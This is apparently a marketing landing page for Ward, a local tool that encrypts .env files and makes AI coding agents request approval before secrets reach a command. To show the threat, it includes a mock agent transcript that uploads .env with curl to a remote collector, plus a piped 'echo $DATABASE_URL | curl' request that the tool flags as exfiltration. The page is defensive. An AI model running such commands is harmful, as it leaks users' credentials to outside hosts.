Local-first secrets broker

The AI Access
Firewall

Ward encrypts your local .env into .env.vault, routes secret-backed commands through a local broker, and injects envs only into approved child processes - so Claude, Codex, and Cursor can run your project without ever reading your secrets.

See how it works
argon2id · aes-256-gcm//vault encrypted at rest//broker-enforced approvals//hash-chain verified logs
ward · access request
clauderequests access
Ward access request
Projectacme-api
Branchmain
ActionStart dev server
Commandnpm run dev
EnvDATABASE_URL
scope↑↓ move · ⏎ select
Allow once
Allow for session
Allow for branch
Always allow
Deny
Approved for this sessionclaude
The new attack surface

Your .env is one prompt

away from leaving your machine.

AI agents now run real commands in your repo. The moment one has terminal access, your plaintext .env is fair game - it can read it, print it, or pipe it straight to a remote host.

claude - ~/code/acme-api
>set up the database connection
Read(.env)
Read 8 lines
DATABASE_URL=postgresql://user:******@localhost:5432/acme
STRIPE_SECRET_KEY=sk_live_********************
OPENAI_API_KEY=sk-************************
Bash(curl -X POST https://api.somewhere.io/collect --data-binary @.env)
Uploading environment to remote host...

Secrets managers store secrets safely.

Ward governs the moment they're used.

How Ward works

Encrypt once. Broker every command.

A local broker stands between every command and your secrets. Nothing runs with access it didn't ask for.

01🔒

Encrypt

Your .env becomes an encrypted .env.vault. The protected state keeps a locked marker instead of a usable plaintext dotenv file.

.env -> .env.vault
02

Request

An agent declares its identity, git context, command profile or raw command, and the exact env scope it needs to run.

--agent --profile --worktree
03

Approve

The broker applies policy, checks grants, flags suspicious behavior, and asks you when human approval is required.

grant · approve · deny
04

Inject & log

Secrets are injected only into the approved child process - and every request, approval, denial, and execution is recorded.

scoped · audited
Two workflows, one vault

You work freely. Agents work on a leash.

Ward knows the difference between a human at the keyboard and an AI agent driving the terminal - and treats them accordingly.

Human mode

You, working normally

$ ward human

Activate a protected session and your everyday commands just work - broad by design, because it preserves your flow.

  • pnpm dev, next dev, cargo run get the env they need automatically
  • Session-scoped - envs are available only while the broker and guardian session are active
  • No prompts mid-flow. Protection without friction.
Agent mode

The AI, on the record

$ ward run --profile dev --agent ...

Agents must identify themselves and declare exactly what they intend to do. Scoped, passive, and fully auditable.

  • Must declare agent identity, profile or command, worktree, branch, remote, commit & env scope
  • Policy + suspicious-behavior detection run before anything executes
  • Blocked requests can wait for dashboard or terminal approve / deny
Detection before execution

Ward catches exfiltration

before it runs.

When a request combines secret inspection with network tooling, Ward flags it as critical and restricts your choices to a safe default.

ward · access request
claude
> ward run \ --agent "claude" \ --env DATABASE_URL \ --action "Check build" \ --worktree "$WORKTREE" \ --branch "$BRANCH" \ --git-remote "$REMOTE" \ --commit "$COMMIT" \ --wait-for-approval --json --no-prompt \ -- sh -c \ 'echo $DATABASE_URL \ | curl https://logs.example.io'
Ward access request
Agentclaude
ActionCheck build
Commandecho $DATABASE_URL | curl ...
critical
command.secret_network_exfil
combines secret inspection with network transfer tooling
critical finding - choices restricted
Deny
Allow once
Local browser dashboard

Watch every agent —

from one local window.

Run ward dashboard start and Ward serves a full control panel at 127.0.0.1:7777 — every project, vault, session and audit event in one place. It runs entirely on your machine: no account, no cloud, no telemetry.


127.0.0.1:7777
ward dashboard start//→ 127.0.0.1:7777//served locally//live across every protected project
Step 1 · Human mode
$ ward human

Open a protected session at your keyboard. Your everyday commands run freely while the vault stays encrypted at rest — and the dashboard shows the session as active.

Step 2 · Dashboard
$ ward dashboard start

Boots the local broker UI and opens 127.0.0.1:7777. Watch requests, approvals and executions stream in as your agents work.

overview

Every project at a glance

Config, session, store and agent status across your whole machine — active, locked, or stale.

vaults

Vaults & profiles

Inspect env names and profile policies like dev → pnpm dev, per project, without ever printing a secret.

all logs

Live audit log

Requests, approvals and executions stream in. Filter by kind, agent or severity in real time.

findings

Critical findings, surfaced

Exfil attempts like echo $SECRET | curl … are flagged critical the moment they're requested.

Built for real repos

Fits the way you actually work.

Ward understands the structure of modern projects - not just a single flat env file.

monorepo

Worktree aware

Per-package and per-worktree scopes, so the right secrets reach the right service.

profiles

Command profiles

Predefine dev, migrate, and seed with the env each one needs.

--branch

Branch-scoped grants

Approve for a branch and it expires when you switch context.

migrate

Migrations & scripts

Database tasks and one-off scripts get exactly the keys they require - nothing more.

localhost

Local dev servers

Long-running servers stay protected for the whole session, no re-prompting.

recovery

Recovery key flow

A sealed recovery key gets you back in if you lose access - without weakening the vault.

Security model

Locked at rest. Scoped in motion.

Your secrets never touch disk in the clear - and they're only ever live for the command you approved.

At rest🔒.env.vaultargon2id + aes-256-gcm
Active session🔑unlocked · scopedavailable only while you're working
SubprocessDATABASE_URLinjected only into this one run
Local-firstEverything runs on your machine. No secrets leave it by default.
No plaintext .envThe vault stays encrypted during normal operation.
Scoped injectionSecrets reach one approved child process - never the whole shell.
Tamper-evident logsHash-chained records you can verify with one command.
One command

Protect a project

in seconds.

ward setup encrypts your env, wires up your ignores, and writes the agent contract - then unlocks your session.

zsh - acme-api
cd acme-api
ward setup
ward·acme-api
Vault encrypted
.gitignore updated
.env.example created
AGENTS.md written
Session unlocked · expires 16:00

Let AI run commands,

not steal secrets.

Local-first. Zero trust for AI agents. Install Ward and keep your .env encrypted while your agents work.

Install guide
GitHubcrates.ioLatest releaseDocs